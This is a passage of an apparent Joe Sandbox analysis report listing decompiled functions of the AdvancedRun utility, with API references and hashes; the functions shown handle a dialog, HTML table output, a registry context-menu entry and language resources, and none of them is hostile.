				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                  0x00403c09
                                                                  0x00403c0c
                                                                  0x00403c11
                                                                  0x00403c1b
                                                                  0x00403c3f
                                                                  0x00403c4a
                                                                  0x00403c6e
                                                                  0x00403c96
                                                                  0x00403c9a
                                                                  0x00403ca6
                                                                  0x00403cb3
                                                                  0x00403cb8
                                                                  0x00403cc5
                                                                  0x00403cca
                                                                  0x00403cdd
                                                                  0x00403ce6
                                                                  0x00403cf8
                                                                  0x00403d11
                                                                  0x00403d26
                                                                  0x00403d3f
                                                                  0x00403d54
                                                                  0x00403d6d
                                                                  0x00403d76
                                                                  0x00403d88
                                                                  0x00403d9e
                                                                  0x00403db0
                                                                  0x00403db5
                                                                  0x00403dc4
                                                                  0x00403dc8
                                                                  0x00403dc9
                                                                  0x00403dca
                                                                  0x00403dda
                                                                  0x00403ddf
                                                                  0x00403de2
                                                                  0x00403de3
                                                                  0x00403df4
                                                                  0x00403df8
                                                                  0x00403df9
                                                                  0x00403dfa
                                                                  0x00403e0a
                                                                  0x00403e0f
                                                                  0x00403e12
                                                                  0x00403e13
                                                                  0x00403e22
                                                                  0x00403e26
                                                                  0x00403e28
                                                                  0x00403e29
                                                                  0x00403e39
                                                                  0x00403e3e
                                                                  0x00403e41
                                                                  0x00403e42
                                                                  0x00403e51
                                                                  0x00403e55
                                                                  0x00403e57
                                                                  0x00403e58
                                                                  0x00403e68
                                                                  0x00403e6d
                                                                  0x00403e70
                                                                  0x00403e71
                                                                  0x00403e71
                                                                  0x00403e87
                                                                  0x00403e8d
                                                                  0x00403e9e
                                                                  0x00403ea6
                                                                  0x00403eaf
                                                                  0x00403ebc

                                                                  APIs
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 1038210931-0
                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 56%
                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                  0x00407763
                                                                  0x0040776c
                                                                  0x00407784
                                                                  0x0040778b
                                                                  0x00407797
                                                                  0x00407799
                                                                  0x0040779b
                                                                  0x004077a7
                                                                  0x004077ae
                                                                  0x004077bd
                                                                  0x004077c4
                                                                  0x004077d3
                                                                  0x004077da
                                                                  0x004077e1
                                                                  0x004077e6
                                                                  0x004077f2
                                                                  0x004077f5
                                                                  0x00407804
                                                                  0x00407805
                                                                  0x00407810
                                                                  0x00407812
                                                                  0x00407813
                                                                  0x00407818
                                                                  0x00407818
                                                                  0x00407825
                                                                  0x0040782d
                                                                  0x00407830
                                                                  0x0040783a
                                                                  0x00407840
                                                                  0x00407846
                                                                  0x00407849
                                                                  0x00407850
                                                                  0x0040785e
                                                                  0x00407864
                                                                  0x00407867
                                                                  0x0040786b
                                                                  0x0040786f
                                                                  0x00407877
                                                                  0x0040787a
                                                                  0x00407885
                                                                  0x00407892
                                                                  0x004078a8
                                                                  0x004078b8
                                                                  0x004078c5
                                                                  0x004078ff
                                                                  0x004078c7
                                                                  0x004078ca
                                                                  0x004078dd
                                                                  0x004078de
                                                                  0x004078e3
                                                                  0x004078e8
                                                                  0x004078eb
                                                                  0x004078f0
                                                                  0x004078f0
                                                                  0x00407906
                                                                  0x00407909
                                                                  0x0040790f
                                                                  0x0040791d
                                                                  0x00407923
                                                                  0x0040792d
                                                                  0x00407932
                                                                  0x0040793b
                                                                  0x00407942
                                                                  0x00407943
                                                                  0x0040794c
                                                                  0x00407953
                                                                  0x00407954
                                                                  0x00407959
                                                                  0x0040795c
                                                                  0x00407961
                                                                  0x0040796c
                                                                  0x00407971
                                                                  0x0040797a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00407838
                                                                  0x00407838
                                                                  0x0040783a
                                                                  0x00407980
                                                                  0x0040798a
                                                                  0x004079a1

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                  • API String ID: 1607361635-601624466
                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 40%
                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                  0x00407b65
                                                                  0x00407b7c
                                                                  0x00407b83
                                                                  0x00407b91
                                                                  0x00407b98
                                                                  0x00407ba6
                                                                  0x00407bad
                                                                  0x00407bb2
                                                                  0x00407bb9
                                                                  0x00407bca
                                                                  0x00407bcb
                                                                  0x00407bd6
                                                                  0x00407bdb
                                                                  0x00407bdc
                                                                  0x00407be1
                                                                  0x00407be1
                                                                  0x00407be8
                                                                  0x00407bf9
                                                                  0x00407bfa
                                                                  0x00407c05
                                                                  0x00407c0a
                                                                  0x00407c0b
                                                                  0x00407c1c
                                                                  0x00407c21
                                                                  0x00407c21
                                                                  0x00407c2a
                                                                  0x00407c2b
                                                                  0x00407c36
                                                                  0x00407c3b
                                                                  0x00407c3c
                                                                  0x00407c41
                                                                  0x00407c51
                                                                  0x00407c56
                                                                  0x00407c5b
                                                                  0x00407c65
                                                                  0x00407c68
                                                                  0x00407c6b
                                                                  0x00407c74
                                                                  0x00407c7b
                                                                  0x00407c80
                                                                  0x00407c82
                                                                  0x00407c88
                                                                  0x00407ca6
                                                                  0x00407c8a
                                                                  0x00407c8a
                                                                  0x00407c8b
                                                                  0x00407c96
                                                                  0x00407c9b
                                                                  0x00407c9c
                                                                  0x00407ca1
                                                                  0x00407ca1
                                                                  0x00407cb3
                                                                  0x00407cb4
                                                                  0x00407cbd
                                                                  0x00407cc4
                                                                  0x00407cc5
                                                                  0x00407cd0
                                                                  0x00407cd5
                                                                  0x00407cd6
                                                                  0x00407cdb
                                                                  0x00407ceb
                                                                  0x00407cf0
                                                                  0x00407cf3
                                                                  0x00407cf3
                                                                  0x00407cf3
                                                                  0x00000000
                                                                  0x00407cfc
                                                                  0x00407d00

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                  • API String ID: 2000436516-3842416460
                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 51%
                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                  0x00404415
                                                                  0x0040441d
                                                                  0x0040442c
                                                                  0x00404435
                                                                  0x004045b3
                                                                  0x004045b7
                                                                  0x004045b7
                                                                  0x0040444b
                                                                  0x00404452
                                                                  0x00404457
                                                                  0x00404460
                                                                  0x00404461
                                                                  0x00404462
                                                                  0x0040446d
                                                                  0x00404472
                                                                  0x00404473
                                                                  0x00404490
                                                                  0x004044a5
                                                                  0x004044b4
                                                                  0x004044b6
                                                                  0x004044b7
                                                                  0x004044bd
                                                                  0x004044cf
                                                                  0x004044db
                                                                  0x004044eb
                                                                  0x004044f1
                                                                  0x004044f6
                                                                  0x004044f9
                                                                  0x004044fe
                                                                  0x00404506
                                                                  0x00404507
                                                                  0x00404508
                                                                  0x00404510
                                                                  0x00404521
                                                                  0x00404532
                                                                  0x00404539
                                                                  0x00404547
                                                                  0x0040454e
                                                                  0x0040455b
                                                                  0x0040455c
                                                                  0x00404564
                                                                  0x0040456f
                                                                  0x00404570
                                                                  0x00404571
                                                                  0x0040457c
                                                                  0x0040457d
                                                                  0x00404588
                                                                  0x00404589
                                                                  0x0040458a
                                                                  0x004045a0
                                                                  0x004045a5
                                                                  0x00404521
                                                                  0x004044eb
                                                                  0x004045ab
                                                                  0x00000000

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00404452
                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                  • memset.MSVCRT ref: 004044CF
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                  • memset.MSVCRT ref: 00404539
                                                                  • memset.MSVCRT ref: 0040454E
                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                  • API String ID: 486436031-734527199
                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                  0x00406466
                                                                  0x0040647d
                                                                  0x00406484
                                                                  0x00406499
                                                                  0x004064a0
                                                                  0x004064af
                                                                  0x004064b4
                                                                  0x004064bb
                                                                  0x004064cd
                                                                  0x004064d2
                                                                  0x004064d4
                                                                  0x004064e4
                                                                  0x004064ea
                                                                  0x004064ea
                                                                  0x004064f3
                                                                  0x00406503
                                                                  0x00406514
                                                                  0x00406525
                                                                  0x0040653b
                                                                  0x0040654e
                                                                  0x00406568
                                                                  0x00406572
                                                                  0x0040657a
                                                                  0x00406582
                                                                  0x0040658a
                                                                  0x00406596

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406484
                                                                  • memset.MSVCRT ref: 004064A0
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
